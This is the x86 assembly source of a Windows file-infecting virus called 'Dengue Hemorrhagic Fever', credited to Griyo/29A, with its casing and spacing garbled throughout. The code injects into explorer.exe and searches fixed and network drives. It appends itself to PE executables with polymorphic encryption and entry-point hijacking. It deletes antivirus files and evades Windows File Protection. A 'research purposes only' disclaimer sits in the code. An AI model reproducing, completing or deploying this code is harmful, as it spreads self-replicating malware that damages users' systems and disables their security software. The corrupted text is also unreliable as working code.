INC EAX
GNTBA_L2: @seh_removeframe
RET
; ================================================== ===========================
VirloadLib
;
To use crc32 instead of api names sounds cool ... but there is still some
Strings Authors Cant Get Rid of ... WHEN CALLING LOADLIBRARY THE VIRUS MUST
Specify The DLL Name
;
THIS ROUTINE IS The Solution To Avoid The Usage Of DLL Names
;
On Entry:
EAX -> CRC32 of DLL Name
ESI -> CRC32 of API Names
; EDI -> Where to Put API Addresses
ECX -> Number of Apis to find
ON EXIT:
EAX -> Module Handle or Null On Error
; ================================================== =========================== VirloadLib: Push ECX
PUSH ESI
Push EDI
MOV DWORD PTR [EBP A_SDLL_CRC32], EAX
Lea Eax, DWORD PTR [EBP DIRECTFINDDATA]
Push eax; lpfindfiledata
LEA EAX, DWORD PTR [EBP SZSYSTEMDIR]; LPFileName
Push EAX
Call DWORD PTR [EBP A_FINDFIRSTFILEA]
CMP EAX, INVALID_HANDLE_VALUE
JZ Eviroadlib
MOV DWORD PTR [EBP H_FIND], EAX
Checkdllname: Lea ESI, DWORD PTR [EBP DIRECTFINDDATA WFD_SZFILENAME]
Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]
Call parse_filename
MOV ESI, EDX
Call get_str_crc32
CMP EDX, DWORD PTR [EBP A_SDLL_CRC32]
JE OkCheckdll
Lea Eax, DWORD PTR [EBP DIRECTFINDDATA]
Push eax; lpfindfiledata
Push DWORD PTR [EBP H_FIND]; HFINDFILE
Call DWORD PTR [EBP A_FINDNEXTFILEA]
OR EAX, EAX
Jnz Checkdllname
Eviroadlib: POP EDI
POP ESI
POP ECX
XOR EAX, EAX
RET
Okcheckdll: Lea ESI, DWORD PTR [EBP SZSYSTEMDIR]
Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]
Push EDI
Call parse_filename
LEA ESI, DWORD PTR [EBP DIRECTFINDDATA WFD_SZFILENAME]
MOV EDI, EDX
Call parse_filename
Call DWORD PTR [EBP A_LOADLIBRARYA]
OR EAX, EAX
JZ Eviroadlib
MOV EBX, EAX
POP EDI
POP ESI
POP ECX
Call get_apis
Jecxz okvirloadlib
Push EBX
Call DWORD PTR [EBP A_FREELIBRARY]
XOR EAX, EAX
RET
OkvirloadLib: Mov Eax, EBX
RET
; ================================================== ============================ t Routine Takes a string pointed by ESI and COPIES
IT INTO A Buffer Pointed by EDI
;
The result string will be converted to Upper-case
;
On Entry:
ESI -> Pointer to Source String
EDI -> Pointer To Returned String
;
ON EXIT:
; al-> null
; edx -> Points to Character Next To Last /
EDI -> Points 1byte Above the Null Terminator
; ================================================== ===========================
PARSE_FILENAME: MOV EDX, EDI
CLD
Scanzstring: LODSB
CMP Al, "A"
JB NO_UPPER
CMP AL, "Z"
JA NO_UPPER
And Al, 0DFH
NO_UPPER: Stosb
CMP AL, "/"
JNE ERR_SLASH_POS
Mov Edx, EDI
Err_slash_pos: OR Al, Al
JNZ Scanzstring
RET
; ================================================== ===========================; Copyright NOTICE AND DISCLAIMER
; ================================================== ===========================
Copyright DB '[Dengue Hemorrhagic Fever "
DB 'Biocoded by Griyo / 29A]'
DiscLaimer DB 'Disclaimer: this Software Has Been Designed'
DB 'for research purposes only. The author is'
DB 'NOT RESPONSIBLE for ANY Problems Caused Due To'
DB 'Improper or IlleGal Usage Of IT'
; ================================================== ===========================
Virus Initialization (Inside Explorer.exe)
; ================================================== =================================== Explorerinit: Call Explorerdelta
Explorerdelta: POP EBP
Sub EBP, Offset Explorerdelta
; ================================================== ===========
Get Current Local Time
; ================================================== ===========
Freeexplorerok: Lea ESI, DWORD PTR [EBP local_time]
PUSH ESI
Call DWORD PTR [EBP A_GETLOCALTIME]
; ================================================== ===========
Initialize Random Number Generator SEED USING CURRENT
Year and current Month
; ================================================== =========== CLD
Lodsw
ROL Eax, 10h
Lodsw
MOV DWORD PTR [EBP RND32_SEED], EAX
; ================================================== ===========
Locate Kernel32 Code Section in Memory ... this information
Will BE Used Later in The EPO Routines
; ================================================== ===========
MOV EBX, DWORD PTR [EBP HKERNEL32]
Call get_code_sh
MOV EAX, DWORD PTR [EDI SH_VIRTUALADDRESS]
Add Eax, EBX
MOV DWORD PTR [EBP K32CODESTART], EAX
Add Eax, DWORD PTR [EDI SH_VIRTUALSIZE]
MOV DWORD PTR [EBP K32CODEEND], EAX
; ================================================== ===========
; Sleep for a moment, Before Start Making Noise
; ================================================== =========== push 00005000H
Call DWORD PTR [EBP A_SLEP]
; ================================================== ===========
(Load Imagehlp.dll
;
; The imagehlp functions area supported by the microsoft
Windows NT, Windows 95, And Windows 98 Operating Systems ...
; They is used Mostly by Programming Tools, Application Setup
Utilities, And Other Programs That Need Access to the Data
Contained in a pe image
; ================================================== ===========
MOV EAX, DWORD PTR [EBP CRCSZIMGHLP]
MOV ECX, NumImghlPapis
Lea ESI, DWORD PTR [EBP CRC32IMGHLPAPIPAPIS]
Lea EDI, DWORD PTR [EBP Epimghlpapapis]
Call virloadlib
MOV DWORD PTR [EBP HIMGHLP], EAX
; ================================================== ===========; load sfc.dll (windows 2000 only)
; ================================================== ===========
MOV DWORD PTR [EBP HSFC], 00000000H
CMP DWORD PTR [EBP DWMAJORVERSION], 00000005H
JB Ready2infect
MOV EAX, DWORD PTR [EBP CRCSZSFC]
MOV ECX, NUMSFCAPIS
LEA ESI, DWORD PTR [EBP CRC32SFCAPIS]
Lea EDI, DWORD PTR [EBP EPSFCAPIS]
Call virloadlib
MOV DWORD PTR [EBP HSFC], EAX
; ================================================== ===========
Initialization Inside Explorer.exe Complete ...
;
Now create a thread to search for files to infect and
Get Control Back to Explorer.exe
; ================================================== ===========
Ready2infect: Lea Eax, DWORD PTR [EBP IF_THREADID]
Push Eax; LPTHREADIDXOR EDX, EDX
Push EDX; DWCREATIONFLAGS
Push EDX; LPParameter
Lea Eax, DWORD PTR [EBP Infectionthread]
Push Eax; LPStartAddress
Push Edx; DWSTACKSIZE
Push Edx; LPTHREADATTRIBUTES
Call DWORD PTR [EBP A_CREATTHREAD]
OR EAX, EAX
JZ AfTERTHREAD
Ret; Let the Thread Running Until Terminates
; ================================================== ===========
Free SFC
; ================================================== ===========
AfTerthread: MOV Eax, DWORD PTR [EBP HSFC]
OR EAX, EAX
JZ SfcNotloaded
Push EAX
Call DWORD PTR [EBP A_FREELIBRARY]
; ================================================== ===========
Free imagehlp
; ================================================== ===========
SFCNOTLOADED: MOV EAX, DWORD PTR [EBP HIMGHLP]
OR EAX, EAX
JZ EXITITHREAD
Push EAX
Call DWORD PTR [EBP A_FREELIBRARY]
RET
; ================================================== ===========================
; Virus Infection Thread, Created from INSIDE Explorer.exe Process
; ================================================== ===========================
Infectionthread: Call ThreadDelta
ThreadDelta: POP EBP
Sub ebp, offset threaddelta
LEA ESI, DWORD PTR [EBP SZLOGICALDRIVES]]
Mov Edi, Sizeof_LDSB
PUSH ESI
Push EDI
Call DWORD PTR [EBP A_GETLOGICALDRIVESTRINGSA]
OR EAX, EAX
JZ EXITITHREAD
CMP EAX, EDI
Ja exitithread
; ================================================== ===========
FOLLOW The Drives Chain
; ================================================== =========== DriveSloop: CMP Byte Ptr [ESI], 00H
JNZ Moredrives
; ================================================== ===========
; Terminate Infection Thread
; ================================================== ===========
ExitithRead: CallAftethread
Push 00000000H
Call dword PTR [EBP A_EXITTHREAD]; Leave the Thread
; ================================================== ===========
Check Drive Type, ONLY Fixed or Remote Drives Allowed
; ================================================== ===========Moredrives: Push ESI
Call DWORD PTR [EBP A_GETDRIVETYPEA]
CMP EAX, 00000003H; Drive_Fixed
Je CheckthisDrive
CMP Eax, 00000004; Drive_Remote
JNE NEXTDRIVE
; ================================================== ===========
Got it! Do Recursive Search on Drive
; ================================================== ===========
CheckThisdrive: Push ESI
Lea EDI, DWORD PTR [EBP BUFGETDIR]
Push EDI
Call parse_filename
Call search4files
POP EDI
POP ESI
NextDrive: CLD
NextDSTRING: LODSB
OR Al, Al
Jnz nextdstring
JMP Drivesloop
; ================================================== ===========================
Search for Target ...
;
; Tris routine its able to call itself in Order to Perform A Recursive; Search All Along The Entire Directory Tree
;
; ================================================== ===========================
; ================================================== ===========
Store Local Information on The Stack
; ================================================== ===========
Search4Files: SUB ESP, SIZEOF_WIN32_FIND_DATA 00000004H
MOV EBX, ESP
Find frame:
;
Path WHERE TO Perform Search (Size Max_Path)
Return Address (Size DWORD)
FindHandle (Size DWORD)
Find Data (size sizeof_win32_find_data)
Findstack_ptr2finddata EQU 00000000H
Findstack_ptr2findhandle EQU SIZEOF_WIN32_FIND_DATA
Findstack_ptr2returnaddress EQU SIZEOF_WIN32_FIND_DATA 00000004H
Findstack_ptr2searchPath EQU SIZEOF_WIN32_FIND_DATA 00000008H
; ================================================== ===========; Do FindfirstFile
; ================================================== ===========
Push ebx; lpfindfiledata
MOV ESI, DWORD PTR [EBX FINDSTACK_PTR2SearchPath]
Mov EDI, ESI
Push EDI; LPFileName
Call parse_filename
Dec Edi
CMP Byte PTR [EDI-00000001H], '/'
JNE Rootaware
Dec Edi
Rootaware: MOV EAX, '*. * /'
Stosd
XOR EAX, EAX
Stosb
Call DWORD PTR [EBP A_FINDFIRSTFILEA]
CMP EAX, INVALID_HANDLE_VALUE
JE ErrorFindFirst
MOV DWORD PTR [EBX FINDSTACK_PTR2FINDHANDLE], EAX
; ================================================== ===========
Find Data Ready to Be Checked
; ================================================== ===========
GOFINDRECORD: Lea ESI, DWORD PTR [EBX WFD_SZFILENAME]
CLD
Lodsd
; ================================================== ===========
Check for...
; ================================================== ===========
CMP AX, 002EH
JE DOFINDNEXT
And Eax, 00ffffh
CMP EAX, 00002E2EH
JE DOFINDNEXT
; ================================================== ===========
CHECK IF this is A Directory
; ================================================== ===========
MOV EAX, DWORD PTR [EBX]
Test Eax, File_Attribute_directory
JZ DofileFound
; ================================================== ===========
Directory Found, Perform Recursive Search on it; ======================================== ====================
Push EBX
MOV ESI, DWORD PTR [EBX FINDSTACK_PTR2SearchPath]
SUB ESP, MAX_PATH
MOV EDI, ESP
Push EDI
Call parse_filename
Lea ESI, DWORD PTR [EBX WFD_SZFILENAME]
MOV EDI, EDX
Call parse_filename
Call search4files
POP EDI
Add ESP, MAX_PATH
POP EBX
JMP DOFINDNEXT
; ================================================== ===========
File Found, Check if its a valid host
; ================================================== ===========
DOFILEFOUND: AND Eax, file_attribute_directory or /
FILE_ATTRIBUTE_COMPRESSED OR /
FILE_ATTRIBUTE_SYSTEM
JNZ DOFINDNEXT
; ================================================== ===========
Save file time
; ================================================== =========== CLD
Lea ESI, DWORD PTR [EBX WFD_FTCRETIONTIME]
Lea EDI, DWORD PTR [EBP FT_CRETIONTIME]
Movsd; ftcreationTIME (DWLOWDATETIME)
Movsd; ftcreationTIME (DWHighDateTime)
Movsd; ftlastaccesstime (dwilldatetime)
Movsd; ftlastaccesstime (dwhighdatetime)
Movsd; ftlastwritetime (dwilldatetime)
Movsd; ftlastwritetime (dwhighdatetime)
; ================================================== ===========
Check if File Size is allowed
; ================================================== ===========
Lodsd; EDI POINTS to WFD_NFILESIGHIGH
OR EAX, EAX
JNZ DOFINDNEXT
Lodsd
CMP EAX, 0FFFFFFFFH- /
(SIZE_VIRTUAL (Number_Of_Poly_Layers * 00004000H)))
Jae DOFINDNEXT
CMP Eax, Inf_SIZE
JBE DOFINDNEXT
; ================================================== ===========; Save the File Size for L8R USE
; ================================================== ===========
MOV DWORD PTR [EBP FileSizeondisk], EAX
; ================================================== ===========
Check if file is already infected, using size padding
; ================================================== ===========
Size_padding Equ 00000065H
MOV ECX, SIZE_PADDING
XOR EDX, EDX
Div ECX
OR EDX, EDX
JZ DOFINDNEXT
; ================================================== ===========
Get Complete Path FileName and Convert it to Upper Case; ====================================== =====================================================================================================================================================
MOV ESI, DWORD PTR [EBX FINDSTACK_PTR2SearchPath]
Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]
Call parse_filename
Lea ESI, DWORD PTR [EBX WFD_SZFILENAME]
MOV EDI, EDX
Call parse_filename
; al-> null
; EDX -> Points to FileName At the end of path
EDI -> Points 1byte Above the Null Terminator
; ================================================== ===========
Check File Extension
; ================================================== ===========
LEA ESI, DWORD PTR [EDI-00000005H]
Call get_str_crc32
Lea ESI, DWORD PTR [EBP TBLCRC32SZEXT]
MOV ECX, Numberofext
CheckextLoop: Lodsd
Sub Eax, EDX
JNZ NOINTERESTED
; ================================================== ===========; Extension match ... infect file
; ================================================== ===========
Call fileInfection
JMP Short DofindNext
Nointerested: loop checkextloP
; ================================================== ===========
None of infectable extensions match
Leets See if this file is an AV Related File ...
; ================================================== ===========
Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]
Mov EDI, ESI
Call Parse_FileName; Parse and Reparse
MOV ESI, EDX
Call get_str_crc32
LEA ESI, DWORD PTR [EBP TBLCRC32AV]
MOV ECX, Numberofav
Checkavloop: Lodsd
Sub Eax, EDX
Jnz avnomatch
; ================================================== ===========; av file found ... reset ITS Attributes and delete it
; ================================================== ===========
Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]
Push Eax; 00000000H
PUSH ESI
Call DWORD PTR [EBP A_SETFILEATTRIBUTESA]
PUSH ESI
Call DWORD PTR [EBP A_DELETEFILEA]
JMP Short DofindNext
Avnomatch: loop checkavloop
; ================================================== ===========
; Before looking for more files letts sleep a while
; ================================================== ===========
DOFINDNEXT: MOV EAX, 00000800H
Call get_rnd_range
Add eax, 00000400H
Push EAX
Call DWORD PTR [EBP A_SLEP]
; ================================================== ===========; Find Next Directory or File
; ================================================== ===========
Push ebx; lpfindfiledata
Push DWORD PTR [EBX FINDSTACK_PTR2FINDHANDLE]
Call DWORD PTR [EBP A_FINDNEXTFILEA]
OR EAX, EAX
JNZ Gof Indrecord
ErrorFindFirst: Mov Eax, 00002000H
Call get_rnd_range
Add Eax, 00001000H
Push EAX
Call DWORD PTR [EBP A_SLEP]
Push DWORD PTR [EBX FINDSTACK_PTR2FINDHANDLE]
Call DWORD PTR [EBP A_FINDCLOSE]
MOV ESP, EBX
Add ESP, SIZEOF_WIN32_FIND_DATA 00000004H
RET
; ================================================== ===========================
; Infect PE Files
;
On Entry:
BUFSTRFILENAME -> Buffer That Contains Complete Path and
FILENAME
DirectFinddata -> Win32 Find Data Structure Filled with
Information About the file to infect
; ================================================== =========================== fileinfection: Push EBX
Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]
Mov EDI, ESI
Call parse_filename
MOV ESI, EDX
*********************************************************** ***********************************
; MOV EAX, DWORD PTR [ESI]
; CMP EAX, 'TAOG'
JNE EXITFILEINF
*********************************************************** ***********************************
; ================================================== ===========
Avoid Some Files from Being Infected
; ================================================== ===========
Checkfilename: Push ESI
MOV ECX, 00000002H
Call get_crc32
LEA ESI, DWORD PTR [EBP AVOID_TBL]
MOV ECX, Avoid_Num
AvoidLoop: Lodsd
CMP EAX, EDX
JNE NEXTAVOID
POP ESI
JMP EXITFILEINF
NEXTAVOID: LOOP AVOIDLOOP
POP ESI
Lodsb
CMP Al, '.'
JNE CheckfileName
; ================================================== ===========; Check if file is protected by Windows File Protection
(Windows 2000 ONLY)
; ================================================== ===========
CMP DWORD PTR [EBP HSFC], 00000000H
JZ Notprotected
Lea Eax, DWORD PTR [EBP BUFSTRFILENAME]
Push EAX
Push 00000000H
Call dword PTR [EBP A_SFCISFILEPROTECTED]
OR EAX, EAX
JNZ EXITFILEINF
; ================================================== ===========
; Try to Infect this file
; ================================================== ===========
Notprotaced: Call Tryattach
; ================================================== ===========; EXIT FILE Infection
; ================================================== ===========
EXITFILEINF: POP EBX
RET
; ================================================== ===========================
Infect File Routines
;
On Entry:
BUFSTRFILENAME -> Buffer Filled with Path FileName
; ================================================== ===========================
SEH_BLOCK_0001 Macro
Add ESP, -CPUSHAD
JNZ APE_ERR
ENDM
; ================================================== ===========; Open Target File for Read-Only Access
; ================================================== ===========
Tryattach: Call Filemapro
OR EAX, EAX
JZ INF_FILE_ERR
; ================================================== ===========
Register EBX Contains The Base Address of The Target File
ALL Along Infection Routines
; ================================================== ===========
MOV EBX, EAX
; ================================================== ===========
Check for MZ Signature At Base Address; =========================================== ===================
CLD
CMP Word PTR [EBX], Image_DOS_SIGNATURE
JNE INF_CLOSE_FILE
; ================================================== ===========
Check File Address of Relocation Table
; ================================================== ===========
CMP Word PTR [EBX MZ_LFARLC], 0040H
JB INF_CLOSE_FILE
; ================================================== ===========
Now Go to the Pe Header and Check for the PE SIGNATURE
; ================================================== =========== Mov ESI, DWORD PTR [EBX MZ_LFANEW]
MOV EAX, DWORD PTR [EBP FileSizeOnDisk]
SHR EAX, 01H
CMP ESI, EAX
JAE INF_CLOSE_FILE
Add ESI, EBX
Lodsd
CMP EAX, Image_NT_SIGNATURE
JNE INF_CLOSE_FILE
; ================================================== ===========
Check Machine Field In Image_File_Header
; Just Allow i386 PE Files
; ================================================== ===========
CMP Word PTR [ESI FH_MACHINE], Image_FILE_MACHINE_I386
JNE INF_CLOSE_FILE
; ================================================== ===========
Now Check The Characteristics, Look IF File
IS an executable
; ================================================== =========== Mov AX, Word PTR [ESI FH_CHARACTERISTICS]
Test AX, Image_File_executable_image or /
Image_file_32bit_machine
JZ INF_CLOSE_FILE
; ================================================== ===========
Avoid DLL'S
; ================================================== ===========
Removed to allow .cpl infection
;
Test AX, Image_File_DLL
JNZ INF_CLOSE_FILE
; ================================================== ===========
; Virus Resides on Last Section
; ================================================== =========== Call GET_LAST_SH
JECXZ INF_CLOSE_FILE
; ================================================== ===========
Check Subsystem, ONLY GUI Applications Allowed
; ================================================== ===========
Movzx Eax, Word PTR [ESI OH_SUBSYSTEM]
CMP EAX, Image_Subsystem_Windows_gui
JNE INF_CLOSE_FILE
; ================================================== ===========
; Save RVA of Last Section
; ================================================== ===========
Mov Eax, EDI
Sub Eax, EBXMOV DWORD PTR [EBP VIRUS_SH], EAX
; ================================================== ===========
This is an attempt to avoid offending pe file formats
; ================================================== ===========
Mov Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]
Add Eax, DWORD PTR [EDI SH_SIZEOFRAWDATA]
Add Eax, DWORD PTR [ESI OH_FILALIGNMENT]
CMP EAX, DWORD PTR [EBP FileSizeOnDisk]
JB INF_CLOSE_FILE
; ================================================== ===========
Save a Pointer to Imports
; ================================================== ===========
MOV EAX, DWORD PTR [ESI /
OH_DATADIRECTORY /
DE_IMPORT /
DD_VIRTUALADDRESS]
MOV DWORD PTR [EBP FileImport], EAX
; ================================================== ===========; Go to Relocations
; ================================================== ===========
MOV EAX, DWORD PTR [ESI /
OH_DATADIRECTORY /
DE_BASERELOC /
DD_VIRTUALADDRESS]
OR EAX, EAX
JZ Cant_OverWrite
; ================================================== ===========
; RELOCATIONS Section Is The Last Section?
; ================================================== ===========
SUB EAX, DWORD PTR [EDI Sh_VIRTUALADDRESS]
JZ GOT_VIR_OFFSET
; ================================================== ===========; We Cant Overwrite Relocations ...
; ... lets attach the virus to the end of last section
; ================================================== ===========
Cant_overwrite: Mov Eax, DWORD PTR [EDI Sh_SIZEOFRAWDATA]
MOV EDX, DWORD PTR [EDI Sh_VIRTUALSIZE]
CMP EAX, EDX
JAE GOT_VIR_OFFSET
MOV EAX, EDX
GOT_VIR_OFFSET: Add Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]
MOV DWORD PTR [EBP VIR_OFFSET], EAX
; ================================================== ===========
; Search Inside Host Code ...
; ================================================== ===========
@Seh_setupframe
XOR ECX, ECX
Pushhad
Call doepo
MOV DWORD PTR [ESP PUSHAD_ECX], ECX
APE_ERR: POPAD
@Seh_removeframe
JECXZ INF_CLOSE_FILEMOV DWORD PTR [EBP INJECT_OFFS], ECX
; ================================================== ===========
Close File ...
; ================================================== ===========
Call fileunmapro
; ================================================== ===========
; ... and remap with iversize
; ================================================== ===========
Call filemaprw
OR EAX, EAX
JZ INF_FILE_ERR
Add DWORD PTR [EBP VIRUS_SH], EAX
MOV EBX, EAX
; ================================================== ===========
Move virus to file; ============================================= ================
Lea ESI, DWORD PTR [EBP VIRO_SYS]
MOV EDI, DWORD PTR [EBP VIR_OFFSET]
Add Edi, EBX
Push EDI
MOV ECX, INF_SIZE
CLD
REP MOVSB
; ================================================== ===========
Save Original Code
; ================================================== ===========
MOV ESI, DWORD PTR [EBP INJECT_OFFS]
Add ESI, EBX
POP EDI
Push EDI
Add Edi, ORG_CODE-VIRO_SYS
CLD
Movsb
Movsd
; ================================================== ===========
; Save Some Registers on 1st Decryptor
; ================================================== =========== Mov ECX, 00000004H
Push ECX
Lea EDI, DWORD PTR [EBP TBLSTDPSHP]
CLD
Cleanstdloop: Mov Eax, 00000004H
Sub Eax, ECX
Stosd
Loop cleanstdloop
POP ECX
Push ECX
Lea EDI, DWORD PTR [EBP PSHPSTEPINDEX]
Gentblstdloop: MOV EAX, 00000004H
Call get_rnd_range
LEA ESI, DWORD PTR [EBP TBLSTDPSHP EAX * 04H]
Lodsd
CMP EAX, 0FFFFFFFH
JZ geentblstdloop
Stosd
MOV DWORD PTR [ESI-00000004H], 0FFFFFFFH
Loop gentsblstdloop
POP ECX
Lea ESI, DWORD PTR [EBP PSHPSTEPINDEX]
POP EDI
Push EDI
Add Edi, TBLDOPOLYPOPS-VIRO_SYS
DOPOLYPOPSLOOP: LODSD
Lea EDX, DWORD PTR [EBP EAX TBLDOPOP]
Mov Al, Byte Ptr [EDX]
Stosb
Loop dopolypopsloop
; ================================================== ===========
Prepare First Decryptor Mark
; ================================================== ===========
MOV BYTE PTR [EBP ISFIRST], CL
; ================================================== ===========; Initialize Size Of All Decryptors
; ================================================== ===========
MOV DWORD PTR [EBP DECRYPTOR_SIZE], ECX
; ================================================== ===========
; Get CRC32 of Main Virus Body and Save IT for L8R USE
; ================================================== ===========
POP ESI
PUSH ESI
Add ESI, CRC_PROTECTED-VIRO_SYS
Mov ECX, SizeoftProtect
Call get_crc32
POP EDI
MOV DWORD PTR [EDI ViRalChecksum-Viro_sys], EDX
; ================================================== ===========; Generate Polymorphic Encryption
; ================================================== ===========
Add Edi, INF_SIZE
MOV EDX, DWORD PTR [EBP VIR_OFFSET]
Mov Eax, Number_Of_Poly_Layers
Call get_rnd_range
INC EAX
INC EAX
MOV ECX, EAX
Each_Layer: Push ECX
CMP ECX, 00000001H
JNE set1stflag
MOV DWORD PTR [EBP ISFIRST], 0FFH
Set1stflag: MOV ECX, DWORD PTR [EBP DECRYPTOR_SIZE]
Add ECX, INF_SIZE
MOV ESI, DWORD PTR [EBP VIR_OFFSET]
Call Mutate
Add DWORD PTR [EBP DECRYPTOR_SIZE], ECX
POP ECX
LOOP Each_Layer
; ================================================== ===========
; Insert a call to Virus Code over the API CALL
; ================================================== ===========
MOV EDI, DWORD PTR [EBP INJECT_OFFS] Add Edi, EBX
Mov al, 0e8h
Stosb
Push EDI
; ================================================== ===========
Calculate The Call Displacement
; ================================================== ===========
Call get_code_sh
MOV EAX, DWORD PTR [ESI OH_FILALIGNMENT]
MOV DWORD PTR [EBP RAW_ALIGN], EAX
MOV EAX, DWORD PTR [EBP INJECT_OFFS]
Sub Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]
Add Eax, DWORD PTR [EDI SH_VIRTUALADDRESS]
Push EAX
MOV EAX, DWORD PTR [EBP Entry_Point]
Sub eax, 00000005H
Sub Eax, EBX
MOV EDI, DWORD PTR [EBP VIRUS_SH]
Sub Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]
Add Eax, DWORD PTR [EDI SH_VIRTUALADDRESS]
POP EDX
Sub Eax, EDX
POP EDI
Stosd
MOV EDI, DWORD PTR [EBP VIRUS_SH]
; ================================================== ===========
; Set Read / Write Access on Virus Section
; ================================================== =========== OR DWORD PTR [EDI Sh_Characteristics], /
Image_scn_mem_read or image_scn_mem_write
; ================================================== ===========
DONT Share Virus Section
; ================================================== ===========
And DWORD PTR [EDI SH_CHARACTERISTICS], /
Not image_scn_mem_shared
; ================================================== ===========
Update SizeOfrawData
; ================================================== ===========
MOV EAX, DWORD PTR [EBP VIR_OFFSET] Add Eax, DWORD PTR [EBP DECRYPTOR_SIZE]
Add Eax, Inf_Size
MOV EDX, DWORD PTR [EDI Sh_POINTERTORAWDATA]
MOV DWORD PTR [EBP FIX_SIZE], EDX
Sub Eax, EDX
CMP EAX, DWORD PTR [EDI Sh_SIZEOFRAWDATA]
Jbe rawsizeok
; ================================================== ===========
; If we change SizeofrawData Round Up to nearest
File Alignment
; ================================================== ===========
XOR EDX, EDX
MOV ECX, DWORD PTR [EBP RAW_ALIGN]
Div ECX
INC EAX
Mul ECX
MOV EDX, DWORD PTR [EDI Sh_SIZEOFRAWDATA]
Mov DWORD PTR [EDI SH_SIZEOFRAWDATA], EAX
Sub Eax, EDX
Test DWORD PTR [EDI SH_CHARACTERISTICS], /
Image_scn_cnt_initialized_data
JZ Rawsizeok
Add DWORD PTR [ESI OH_SIZEOFINIALIZEDDATA], EAX
; ================================================== ===========
Update Virtualsize
; ================================================== =========== Rawsizeok: MOV Eax, DWORD PTR [EDI Sh_SIZEOFRAWDATA]
Add DWORD PTR [EBP FIX_SIZE], EAX
Add eax, size_virtual-inf_size
CMP EAX, DWORD PTR [EDI SH_VIRTUALSIZE]
Jbe Virtualsizeok
MOV DWORD PTR [EDI SH_VIRTUALSIZE], EAX
; ================================================== ===========
Update SizeOfImage
; ================================================== ===========
Virtualsizeok: MOV Eax, DWORD PTR [EDI Sh_VIRTUALADDRESS]
Add Eax, DWORD PTR [EDI SH_VIRTUALSIZE]
XOR EDX, EDX
MOV ECX, DWORD PTR [ESI OH_SECTIONALNMENT]
Div ECX
INC EAX
Mul ECX
MOV DWORD PTR [ESI OH_SIZEOFIMAGE], EAX
; ================================================== ===========
FIND ANY DATA DIRECTORY Entry Pointing to Last Section; ======================================= =====================
MOV ECX, image_numberof_directory_entries
Lea EDX, DWORD PTR [ESI OH_DATADIRECTORY]
FDATAPTR2LAST: MOV EAX, DWORD PTR [EDX]
CMP EAX, DWORD PTR [EDI Sh_VIRTUALADDRESS]
JNE NextFDataPtr
MOV EAX, DWORD PTR [EDI SH_VIRTUALSIZE]
Mov DWORD PTR [EDX 00000004H], EAX
JMP Short DonefdataPtr
NextfdataPtr: add edx, 00000008H
Loop fdataptr2last
; ================================================== ===========
Clear Base Relocation Field
; ================================================== ===========
DONEFDATAPTR: XOR EAX, EAX
Lea EDI, DWORD PTR [ESI /
OH_DATADIRECTORY /
DE_BASERELOC /
DD_VIRTUALADDRESS]
CLD
Stosd
Stosd
; ================================================== ============ COMPUTE New File Checksum and Update It On Pe Header
; ================================================== ===========
MOV EAX, DWORD PTR [EBP FIX_SIZE]
MOV ECX, SIZE_PADDING
XOR EDX, EDX
Div ECX
INC EAX
Mul ECX
Push EAX
CMP DWORD PTR [EBP HIMGHLP], 00000000H
JZ Nochecksum
MOV BYTE PTR [EBX EAX], 00H
Mov Edx, EAX
Lea ESI, DWORD PTR [EBP CHECKSUMPE]
Push ESI; Checksum
Lodsd
Push ESI; Headersum
Push EDX; FileLength
Push EBX
Call DWORD PTR [EBP A_CHECKSUMMAPPEDFILE]
OR EAX, EAX
JZ Nochecksum
CMP DWORD PTR [ESI], 00000000H
JZ Nochecksum
MOV EDX, DWORD PTR [ESI-00000004h]
Mov DWORD PTR [EAX /
NT_OPTIONALHEADER.OH_CHECKSUM], EDX
; ================================================== ===========
Mark File As Infected and Optimize File Size
; ================================================== =========== Nochecksum: POP EAX
Mov DWORD PTR [EBP FATSIZE], EAX
Call fileunmaprw
RET
; ================================================== ===========
Close File Mapping
; ================================================== ===========
INF_CLOSE_FILE: CALL Fileunmapro
INF_FILE_ERR: RET
; ================================================== ===========================
Scan Host Code
;
On Entry:
EBX -> Memory Image Base Address
EXIT:
ECX -> Inject Point Offset in File
OR NULL IF ERROR
; ================================================== =================================================================================================================================================================================== #
Call Rva2Raw
MOV DWORD PTR [EBP Importsh], EDI
Call get_code_sh
JECXZ EXITAPE
MOV EAX, DWORD PTR [ESI OH_IMAGEBASE]
MOV DWORD PTR [EBP HOST_BASE], EAX
Sub EDX, DWORD PTR [EDI SH_VIRTUALADDRESS]
MOV ECX, DWORD PTR [EDI Sh_SIZEOFRAWDATA]
SUB ECX, EDX
Add Edx, DWORD PTR [EDI SH_POINTERTORAWDATA]; Entry-Point Raw
Lea ESI, DWORD PTR [EBX EDX]
Search_call: Push ECX
XOR EAX, EAX
Lodsb
CMP Al, 0E8H; API CALL GENERATED BY BORLAND Linker?
JE TRY_BORLAND
CMP AL, 0FFH; API CALL GENERATED BY Microsoft Linker?
JE TRY_MICROSOFT
ERR_API_CALL: POP ECX
Loop search_call
EXITAPE: RET
Try_borland: MOV Eax, ESI
Add Eax, DWORD PTR [ESI]; Go to Refered Address
Sub Eax, EBX; Convert to RVA
MOV EDX, DWORD PTR [EDI Sh_VIRTUALADDRESS]
CMP EAX, EDX
JB ERR_API_CALL; BELOW CODE?
Add Edx, DWORD PTR [EDI SH_VIRTUALSIZE]
CMP EAX, EDX
JAE ERR_API_CALL; Above Code?
CMP Word PTR [EAX EBX-00000002H], 25ffH; JMP DWORD PTR [xxxx]
JNE ERR_API_CALL
Push DWORD PTR [EAX EBX]
POP EAX
SUB EAX, DWORD PTR [EBP HOST_BASE]; Get A RVA Again
MOV EDX, DWORD PTR [EBP Importsh]
MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]
CMP EAX, ECX
JB ERR_API_CALL; BELOW IMPORTS?
Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]
CMP EAX, ECX
JAE ERR_API_CALL; Above Imports?
Sub Eax, DWORD PTR [EDX SH_VIRTUALADDRESS] Add Eax, DWORD PTR [EDX SH_POINTERTORAWDATA]
Push DWORD PTR [EAX EBX]
POP EAX
MOV EDX, DWORD PTR [EBP Importsh]
